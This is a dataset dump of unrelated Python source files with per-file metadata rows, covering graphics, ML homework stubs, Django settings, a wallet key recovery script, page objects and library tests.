baseDelta = PVector.sub(base2, base1)
baseDelta.normalize()
normal = PVector(-baseDelta.y, baseDelta.x)
# Draw ellipse.
noStroke()
fill(255)
ellipse(position.x, position.y, r * 2, r * 2)
# Move elipse.
position.add(velocity)
# Normalized incidence vector.
incidence = PVector.mult(velocity, -1)
incidence.normalize()
# Detect and handle collision.
for coord in coords:
# Check distance between ellipse and base top coordinates.
if PVector.dist(position, coord) < r:
# Calculate dot product of incident vector and base top normal.
dot = incidence.dot(normal)
# Calculate reflection vector.
# Assign reflection vector to direction vector.
velocity.set(2 * normal.x * dot - incidence.x,
2 * normal.y * dot - incidence.y, 0)
velocity.mult(speed)
# Draw base top normal at collision point.
stroke(255, 128, 0)
line(position.x, position.y,
position.x - normal.x * 100, position.y - normal.y * 100)
# Detect boundary collision.
# Right.
if position.x > width - r:
position.x = width - r
velocity.x *= -1
# Left.
if position.x < r:
position.x = r
velocity.x *= -1
# Top.
if position.y < r:
position.y = r
velocity.y *= -1
# Randomize base top.
base1.y = random(height - 100, height)
base2.y = random(height - 100, height)
createGround()
# Calculate variables for the ground.
def createGround():
# Calculate length of base top.
baseLength = PVector.dist(base1, base2)
# Fill base top coordinate array.
coords = [PVector(base1.x + ((base2.x - base1.x) / baseLength) * i,
base1.y + ((base2.y - base1.y) / baseLength) * i)
for i in range(ceil(baseLength))]
| 25.232759
| 77
| 0.598223
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 964
| 0.329347
|
6594ce65379700398a3a74c57669881f0dce9a22
| 1,182
|
py
|
Python
|
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
linear.py
|
AliRzvn/HW1
|
d6420c1656800372aae78e18327612df540b674e
|
[
"MIT"
] | null | null | null |
import numpy as np
from module import Module
class Linear(Module):
def __init__(self, name, input_dim, output_dim, l2_coef=.0):
super(Linear, self).__init__(name)
self.l2_coef = l2_coef # coefficient of l2 regularization.
self.W = np.random.randn(input_dim, output_dim) # weights of the layer.
self.b = np.random.randn(output_dim, ) # biases of the layer.
self.dW = None # gradients of loss w.r.t. the weights.
self.db = None # gradients of loss w.r.t. the biases.
def forward(self, x, **kwargs):
"""
x: input array.
out: output of Linear module for input x.
**Save whatever you need for backward pass in self.cache.
"""
out = None
# todo: implement the forward propagation for Linear module.
return out
def backward(self, dout):
"""
dout: gradients of Loss w.r.t. this layer's output.
dx: gradients of Loss w.r.t. this layer's input.
"""
dx = None
# todo: implement the backward propagation for Linear module.
# don't forget to update self.dW and self.db.
return dx
| 31.945946
| 80
| 0.600677
| 1,134
| 0.959391
| 0
| 0
| 0
| 0
| 0
| 0
| 610
| 0.516074
|
65958e7861004b1f3934ff47c4a5e6dfe2a86170
| 239
|
py
|
Python
|
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | 1
|
2016-10-26T23:10:57.000Z
|
2016-10-26T23:10:57.000Z
|
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | null | null | null |
iot/common_functions/all_imports.py
|
sankaet/IOT-DB
|
a554f49b9c25ae1a9a91b6a2564489b999da03bd
|
[
"MIT"
] | null | null | null |
from pymongo import MongoClient
from bson import ObjectId
from bson.json_util import dumps
from json import loads
client = MongoClient('localhost', 27017)
IOT_DB = client.iot_db
IOT_SCHEMAS = IOT_DB.iot_schemas
IOT_DATA = IOT_DB.iot_data
| 23.9
| 40
| 0.820084
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.046025
|
6598ac2ebf4cb397f3e2b86a4a598e93fd0dbafd
| 659
|
py
|
Python
|
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | null | null | null |
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | 1
|
2021-06-02T00:14:07.000Z
|
2021-06-02T00:14:07.000Z
|
pages/login_page.py
|
0verchenko/PageObject
|
b50ec33b6f511680e5be14b16c379df825b87285
|
[
"Apache-2.0"
] | null | null | null |
from .base_page import BasePage
from .locators import LoginPageLocators
class LoginPage(BasePage):
def should_be_login_page(self):
self.should_be_login_url()
self.should_be_login_form()
self.should_be_register_form()
def should_be_login_url(self):
assert "login" in self.browser.current_url
def should_be_login_form(self):
login_form = self.browser.find_element(*LoginPageLocators.LOGIN_FORM)
assert login_form.is_displayed()
def should_be_register_form(self):
register_form = self.browser.find_element(*LoginPageLocators.REGISTER_FORM)
assert register_form.is_displayed()
| 29.954545
| 83
| 0.740516
| 584
| 0.886191
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.010622
|
65990aa07c9374074643ecde94fe1aa073f34786
| 4,310
|
py
|
Python
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 16
|
2020-07-05T18:12:41.000Z
|
2022-03-11T21:12:17.000Z
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 25
|
2020-07-04T17:06:40.000Z
|
2021-08-18T09:24:30.000Z
|
tests/test_schema.py
|
LeafyLappa/starlette-jsonapi
|
1cd7268fe78983c0203e4f65549f974d3f5d968f
|
[
"MIT"
] | 3
|
2020-07-10T14:17:44.000Z
|
2021-08-12T11:43:45.000Z
|
import pytest
from marshmallow_jsonapi import fields
from starlette.applications import Starlette
from starlette_jsonapi.resource import BaseResource
from starlette_jsonapi.schema import JSONAPISchema
def test_schema_urls(app: Starlette):
class TResource(BaseResource):
type_ = 'test-resource'
TResource.register_routes(app, '/')
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route = 'test-resource:get'
self_route_kwargs = {'id': '<id>'}
self_route_many = 'test-resource:get_many'
rv = TSchema().dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
}
}
}
rv = TSchema(app=app).dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
},
'links': {
'self': '/test-resource/foo',
},
},
'links': {
'self': '/test-resource/foo',
},
}
def test_prefixed_schema_urls(app: Starlette):
class TResource(BaseResource):
type_ = 'test-resource'
TResource.register_routes(app, '/')
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route = 'test-resource:get'
self_route_kwargs = {'id': '<id>'}
self_route_many = 'test-resource:get_many'
app.url_prefix = 'https://example.com'
rv = TSchema(app=app).dump(dict(id='foo', name='foo-name'))
assert rv == {
'data': {
'id': 'foo',
'type': 'test-resource',
'attributes': {
'name': 'foo-name',
},
'links': {
'self': 'https://example.com/test-resource/foo',
},
},
'links': {
'self': 'https://example.com/test-resource/foo',
},
}
def test_schema_raises_wrong_meta_parameters():
with pytest.raises(ValueError) as exc:
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url = 'foo'
assert str(exc.value) == 'Use `self_route` instead of `self_url` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema2(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url_kwargs = 'foo'
assert str(exc.value) == 'Use `self_route_kwargs` instead of `self_url_kwargs` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema3(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_url_many = 'foo'
assert str(exc.value) == 'Use `self_route_many` instead of `self_url_many` when using the Starlette extension.'
with pytest.raises(ValueError) as exc:
class TSchema4(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
self_route_kwargs = 'foo'
assert str(exc.value) == 'Must specify `self_route` Meta option when `self_route_kwargs` is specified.'
def test_schema_excludes_unknown():
class TSchema(JSONAPISchema):
id = fields.Str(dump_only=True)
name = fields.Str()
class Meta:
type_ = 'test-resource'
d = TSchema().loads('{"data": {"type": "test-resource", "id": "foo", "attributes": {"unknown": "bar"}}}')
assert d == {}
d = TSchema().loads('{"data": {"type": "test-resource", "id": "foo", "attributes": {"name": "bar"}, "unknown": 1}}')
assert d == {'name': 'bar'}
| 30.567376
| 120
| 0.542691
| 1,716
| 0.398144
| 0
| 0
| 0
| 0
| 0
| 0
| 1,215
| 0.281903
|
659af9491af7136fafb0016f0624386d06bcfa4b
| 3,280
|
py
|
Python
|
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | 5
|
2016-10-02T04:57:10.000Z
|
2019-08-12T22:22:39.000Z
|
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | null | null | null |
demo/demo/settings.py
|
ikcam/django-boilerplate
|
d8253665d74f0f18cf9a5fd46772598a60f20c5c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Django settings for demo project.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.urlresolvers import reverse_lazy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__SHHH_ITS_A_SECRET__'
ALLOWED_HOSTS = []
ADMINS = []
MANAGERS = []
INTERNAL_IPS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# To make it look nice
'bootstrap3',
# Boilerplate
'boilerplate',
# Apps
'account',
'store',
)
MIDDLEWARE = (
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.media',
'django.contrib.messages.context_processors.messages',
],
},
},
]
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
]
LOCALE_PATHS = [
os.path.join(BASE_DIR, 'locale'),
]
WSGI_APPLICATION = 'demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = reverse_lazy('account:login')
| 24.661654
| 71
| 0.690549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,154
| 0.656707
|
659cc327a8d71d143b1d4f60325b26e2f3b52adc
| 818
|
py
|
Python
|
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
pem_recover.py
|
EggPool/gpg-experiments
|
82f79fc05dbc745a84b9bb14c60161716cd08756
|
[
"MIT"
] | null | null | null |
from Cryptodome.PublicKey import RSA
import hashlib
import json
def recover(key):
private_key_readable = key.exportKey().decode("utf-8")
public_key_readable = key.publickey().exportKey().decode("utf-8")
address = hashlib.sha224(public_key_readable.encode("utf-8")).hexdigest()
wallet_dict = {}
wallet_dict['Private Key'] = private_key_readable
wallet_dict['Public Key'] = public_key_readable
wallet_dict['Address'] = address
with open ("wallet_recovered.der", 'w') as wallet_file:
json.dump (wallet_dict, wallet_file)
print ("Wallet recovered to: wallet_recovered.der")
return (address, "wallet_recovered.der")
# Edit with your pem file
with open('privkey.pem', 'r') as f:
private_key_readable = f.read()
key = RSA.importKey(private_key_readable)
recover(key)
| 30.296296
| 77
| 0.720049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.227384
|
659cf1416e415156d8b4e266bad74755407e575d
| 316
|
py
|
Python
|
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/043_IsPower.py
|
netor27/codefights-arcade-solutions
|
69701ab06d45902c79ec9221137f90b75969d8c8
|
[
"MIT"
] | null | null | null |
def isPower(n):
'''
Determine if the given number is a power of some non-negative integer.
'''
if n == 1:
return True
sqrt = math.sqrt(n)
for a in range(int(sqrt)+1):
for b in range(2, int(sqrt)+1):
if a ** b == n:
return True
return False
| 24.307692
| 74
| 0.506329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 86
| 0.272152
|
659ffa3c1d30e46aa593ca5d32d54d54bd7d5e35
| 218
|
py
|
Python
|
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | 1
|
2016-09-24T16:00:06.000Z
|
2016-09-24T16:00:06.000Z
|
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | null | null | null |
plugins/pick/choices.py
|
rbracken/internbot
|
58b802e0dd7597ace12acd9342bb938e2f33c25d
|
[
"BSD-2-Clause"
] | null | null | null |
# Add your own choices here!
fruit = ["apples", "oranges", "pears", "grapes", "blueberries"]
lunch = ["pho", "timmies", "thai", "burgers", "buffet!", "indian", "montanas"]
situations = {"fruit":fruit, "lunch":lunch}
| 36.333333
| 79
| 0.62844
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 143
| 0.655963
|
65a027371c207094c43000aeb78dc0ce9124ddf6
| 1,806
|
py
|
Python
|
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
testing.py
|
blairg23/rename-images-to-datetime
|
e4fc8e34be9d651c4442b023d851bd64fd613e7f
|
[
"MIT"
] | null | null | null |
'''
Stolen straight from https://stackoverflow.com/a/51337247/1224827
'''
try:
import PIL
import PIL.Image as PILimage
from PIL import ImageDraw, ImageFont, ImageEnhance
from PIL.ExifTags import TAGS, GPSTAGS
import os
import glob
except ImportError as err:
exit(err)
class Worker(object):
def __init__(self, img):
self.img = img
self.get_exif_data()
self.date =self.get_date_time()
super(Worker, self).__init__()
def get_exif_data(self):
exif_data = {}
info = self.img._getexif()
if info:
for tag, value in info.items():
decoded = TAGS.get(tag, tag)
if decoded == "GPSInfo":
gps_data = {}
for t in value:
sub_decoded = GPSTAGS.get(t, t)
gps_data[sub_decoded] = value[t]
exif_data[decoded] = gps_data
else:
exif_data[decoded] = value
self.exif_data = exif_data
# return exif_data
def get_date_time(self):
if 'DateTime' in self.exif_data:
date_and_time = self.exif_data['DateTime']
return date_and_time
def main():
date = image.date
print(date)
if __name__ == '__main__':
input_directory = os.path.join(os.getcwd(), 'input')
glob_path = os.path.join(input_directory, '*.jpg')
filepaths = glob.glob(glob_path)
for filepath in filepaths:
filename, extension = os.path.splitext(filepath)
try:
# img = PILimage.open(path + filename)
img = PILimage.open(filepath)
image = Worker(img)
date = image.date
print(date)
except Exception as e:
print(e)
| 26.558824
| 65
| 0.55814
| 941
| 0.521041
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.101329
|
65a0da8d520c64ade98d09bb5d2663a8e3d3134d
| 102
|
py
|
Python
|
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
tftool/access/__init__.py
|
antsfamily/tftool
|
0de72be13b3ca43e8a95c8be726c55841b389973
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from .load import load_ckpt
from .save import save_ckpt
| 17
| 39
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65a11747e48582b0ad97e6b0273c903fafd78306
| 1,730
|
py
|
Python
|
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
scripts/box3d_trpo/sweep_ddpg_0.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
import os
from rllab.envs.normalized_env import normalize
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.envs.gym_env import GymEnv
from railrl.algos.ddpg import DDPG
from railrl.policies.nn_policy import FeedForwardPolicy
from railrl.qfunctions.nn_qfunction import FeedForwardCritic
from rllab.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import get_env_settings
from railrl.core.tf_util import BatchNormConfig
import itertools
import tensorflow as tf
stub(globals())
# Param ranges
seed = 0
policy_lrs = [1e-5, 1e-4, 1e-3]
qf_lrs = [1e-5, 1e-4, 1e-3]
gammas = [0.9, 0.99, 0.995]
taus = [1e-3, 1e-2]
for policy_lr, qf_lr, gamma, tau in itertools.product(policy_lrs, qf_lrs, gammas, taus):
env = TfEnv(normalize(env=GymEnv('Box3dReach-v4',record_video=False, \
log_dir='/tmp/gym_test',record_log=False)))
es = OUStrategy(env_spec=env.spec)
qf = FeedForwardCritic(
name_or_scope="critic",
env_spec=env.spec,
hidden_nonlinearity=tf.nn.tanh,
)
policy = FeedForwardPolicy(
name_or_scope="actor",
env_spec=env.spec,
hidden_nonlinearity=tf.nn.tanh,
)
algo = DDPG(
env,
es,
policy,
qf,
"/data0/dianchen/box3d/ddpg_box3d_state_v4_tf_policy_{0}_qf_{1}_gamma_{2}_tau_{3}".format(
policy_lr,
qf_lr,
gamma,
tau,
),
qf_learning_rate=qf_lr,
policy_learning_rate=policy_lr,
discount=gamma,
soft_target_tau=tau,
gpu_ratio=0.25,
)
run_experiment_lite(
algo.train(),
exp_prefix="ddpg_box3d_state_v4_tf_policy_{0}_qf_{1}_gamma_{2}_tau_{3}".format(
policy_lr,
qf_lr,
gamma,
tau,
),
n_parallel=1,
snapshot_mode="last",
seed=seed,
mode="local"
)
| 23.378378
| 92
| 0.750289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.123699
|
65a1934b198c619626a687dd053ddc9910070a15
| 17,974
|
py
|
Python
|
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine.py
|
popravich/hiku
|
4ce6b46302de61fc17016ddf3af3f378b3fce119
|
[
"BSD-3-Clause"
] | 1
|
2022-01-20T17:03:23.000Z
|
2022-01-20T17:03:23.000Z
|
import re
import pytest
from hiku import query as q
from hiku.graph import Graph, Node, Field, Link, Option, Root
from hiku.types import Record, Sequence, Integer, Optional, TypeRef
from hiku.utils import listify
from hiku.engine import Engine, pass_context, Context
from hiku.builder import build, Q
from hiku.executors.sync import SyncExecutor
from .base import check_result, ANY, Mock
@listify
def id_field(fields, ids):
for i in ids:
yield [i for _ in fields]
OPTION_BEHAVIOUR = [
(Option('op', None), {'op': 1812}, {'op': 1812}),
(Option('op', None, default=None), {}, {'op': None}),
(Option('op', None, default=None), {'op': 2340}, {'op': 2340}),
(Option('op', None, default=3914), {}, {'op': 3914}),
(Option('op', None, default=4254), {'op': None}, {'op': None}),
(Option('op', None, default=1527), {'op': 8361}, {'op': 8361}),
]
def execute(graph, query_, ctx=None):
engine = Engine(SyncExecutor())
return engine.execute(graph, query_, ctx=ctx)
def test_root_fields():
f1 = Mock(return_value=['boiardo'])
f2 = Mock(return_value=['isolde'])
graph = Graph([
Root([
Field('a', None, f1),
Field('b', None, f2),
]),
])
result = execute(graph, build([Q.a, Q.b]))
check_result(result, {'a': 'boiardo', 'b': 'isolde'})
f1.assert_called_once_with([q.Field('a')])
f2.assert_called_once_with([q.Field('b')])
def test_node_fields():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[['harkis']])
f3 = Mock(return_value=[['slits']])
graph = Graph([
Node('a', [
Field('b', None, f2),
Field('c', None, f3),
]),
Root([
Link('d', Sequence[TypeRef['a']], f1, requires=None),
]),
])
result = execute(graph, build([Q.d[Q.b, Q.c]]))
check_result(result, {'d': [{'b': 'harkis', 'c': 'slits'}]})
f1.assert_called_once_with()
f2.assert_called_once_with([q.Field('b')], [1])
f3.assert_called_once_with([q.Field('c')], [1])
def test_node_complex_fields():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[[{'f': 'marshes'}]])
f3 = Mock(return_value=[[{'g': 'colline'}]])
f4 = Mock(return_value=[[[{'h': 'magi'}]]])
graph = Graph([
Node('a', [
Field('b', Optional[Record[{'f': Integer}]], f2),
Field('c', Record[{'g': Integer}], f3),
Field('d', Sequence[Record[{'h': Integer}]], f4),
]),
Root([
Link('e', Sequence[TypeRef['a']], f1, requires=None),
]),
])
check_result(
execute(graph, build([Q.e[Q.b[Q.f], Q.c[Q.g], Q.d[Q.h]]])),
{'e': [{'b': {'f': 'marshes'},
'c': {'g': 'colline'},
'd': [{'h': 'magi'}]}]},
)
f1.assert_called_once_with()
f2.assert_called_once_with(
[q.Link('b', q.Node([q.Field('f')]))], [1],
)
f3.assert_called_once_with(
[q.Link('c', q.Node([q.Field('g')]))], [1],
)
f4.assert_called_once_with(
[q.Link('d', q.Node([q.Field('h')]))], [1],
)
def test_links():
fb = Mock(return_value=[1])
fc = Mock(return_value=[2])
fi = Mock(return_value=[3])
fd = Mock(return_value=[['boners']])
fe = Mock(return_value=[['julio']])
graph = Graph([
Node('a', [
Field('d', None, fd),
Field('e', None, fe),
]),
Root([
Field('i', None, fi),
Link('b', Sequence[TypeRef['a']], fb, requires=None),
Link('c', Sequence[TypeRef['a']], fc, requires='i'),
]),
])
result = execute(graph, build([Q.b[Q.d], Q.c[Q.e]]))
check_result(result, {'b': [{'d': 'boners'}],
'c': [{'e': 'julio'}]})
fi.assert_called_once_with([q.Field('i')])
fb.assert_called_once_with()
fc.assert_called_once_with(3)
fd.assert_called_once_with([q.Field('d')], [1])
fe.assert_called_once_with([q.Field('e')], [2])
@pytest.mark.parametrize('option, args, result', OPTION_BEHAVIOUR)
def test_field_option_valid(option, args, result):
f = Mock(return_value=['baking'])
graph = Graph([
Root([
Field('auslese', None, f, options=[option]),
]),
])
check_result(execute(graph, build([Q.auslese(**args)])),
{'auslese': 'baking'})
f.assert_called_once_with([q.Field('auslese', options=result)])
def test_field_option_unknown():
test_field_option_valid(
Option('inked', None), {'inked': 2340, 'unknown': 8775}, {'inked': 2340}
)
def test_field_option_missing():
graph = Graph([
Root([
Field('poofy', None, Mock(), options=[Option('mohism', None)]),
]),
])
with pytest.raises(TypeError) as err:
execute(graph, build([Q.poofy]))
err.match(r'^Required option "mohism" for Field\(\'poofy\', '
r'(.*) was not provided$')
@pytest.mark.parametrize('option, args, result', OPTION_BEHAVIOUR)
def test_link_option_valid(option, args, result):
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[['aunder']])
graph = Graph([
Node('a', [
Field('c', None, f2),
]),
Root([
Link('b', Sequence[TypeRef['a']], f1, requires=None,
options=[option]),
]),
])
check_result(execute(graph, build([Q.b(**args)[Q.c]])),
{'b': [{'c': 'aunder'}]})
f1.assert_called_once_with(result)
f2.assert_called_once_with([q.Field('c')], [1])
def test_link_option_unknown():
test_link_option_valid(
Option('oleic', None), {'oleic': 2340, 'unknown': 8775}, {'oleic': 2340}
)
def test_link_option_missing():
graph = Graph([
Node('slices', [
Field('papeete', None, Mock()),
]),
Root([
Link('eclairs', Sequence[TypeRef['slices']], Mock(), requires=None,
options=[Option('nocks', None)]),
]),
])
with pytest.raises(TypeError) as err:
execute(graph, build([Q.eclairs[Q.papeete]]))
err.match(r'^Required option "nocks" for Link\(\'eclairs\', '
r'(.*) was not provided$')
def test_pass_context_field():
f = pass_context(Mock(return_value=['boiardo']))
graph = Graph([
Root([
Field('a', None, f),
]),
])
check_result(execute(graph, build([Q.a]), {'vetch': 'shadier'}),
{'a': 'boiardo'})
f.assert_called_once_with(ANY, [q.Field('a')])
ctx = f.call_args[0][0]
assert isinstance(ctx, Context)
assert ctx['vetch'] == 'shadier'
with pytest.raises(KeyError) as err:
_ = ctx['invalid'] # noqa
err.match('is not specified in the query context')
def test_pass_context_link():
f1 = pass_context(Mock(return_value=[1]))
f2 = Mock(return_value=[['boners']])
graph = Graph([
Node('a', [
Field('b', None, f2),
]),
Root([
Link('c', Sequence[TypeRef['a']], f1, requires=None),
]),
])
result = execute(graph, build([Q.c[Q.b]]), {'fibs': 'dossil'})
check_result(result, {'c': [{'b': 'boners'}]})
f1.assert_called_once_with(ANY)
f2.assert_called_once_with([q.Field('b')], [1])
ctx = f1.call_args[0][0]
assert isinstance(ctx, Context)
assert ctx['fibs'] == 'dossil'
with pytest.raises(KeyError) as err:
_ = ctx['invalid'] # noqa
err.match('is not specified in the query context')
def test_node_link_without_requirements():
f1 = Mock(return_value=[1])
f2 = Mock(return_value=[2])
f3 = Mock(return_value=[['arnhild']])
graph = Graph([
Node('a', [
Field('c', None, f3),
]),
Node('b', [
Link('d', Sequence[TypeRef['a']], f2, requires=None),
]),
Root([
Link('e', Sequence[TypeRef['b']], f1, requires=None),
]),
])
result = execute(graph, build([Q.e[Q.d[Q.c]]]))
check_result(result, {'e': [{'d': [{'c': 'arnhild'}]}]})
f1.assert_called_once_with()
f2.assert_called_once_with()
f3.assert_called_once_with([q.Field('c')], [2])
@pytest.mark.parametrize('value', [1, [], [1, 2]])
def test_root_field_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Root([
Field('a', None, Mock(return_value=value)),
]),
]),
build([Q.a]),
)
err.match(re.escape(
"Can't store field values, node: '__root__', fields: ['a'], "
"expected: list (len: 1), returned: {value!r}"
.format(value=value)
))
@pytest.mark.parametrize('value', [1, [], [1, 2], [[], []], [[1], []],
[[], [2]]])
def test_node_field_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=value)),
]),
Root([
Link('c', Sequence[TypeRef['a']], Mock(return_value=[1, 2]),
requires=None),
]),
]),
build([Q.c[Q.b]]),
)
err.match(re.escape(
"Can't store field values, node: 'a', fields: ['b'], "
"expected: list (len: 2) of lists (len: 1), returned: {value!r}"
.format(value=value)
))
def test_root_link_many_func_result_validation():
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
Field('b', None, Mock(return_value=[[3], [4]])),
]),
Root([
Link('c', Sequence[TypeRef['a']], Mock(return_value=123),
requires=None),
]),
]),
build([Q.c[Q.b]]),
)
err.match(re.escape(
"Can't store link values, node: '__root__', link: 'c', "
"expected: list, returned: 123"
))
@pytest.mark.parametrize('value', [1, [], [1, 2, 3]])
def test_node_link_one_func_result_validation(value):
with pytest.raises(TypeError) as err:
execute(
Graph([
Node('a', [
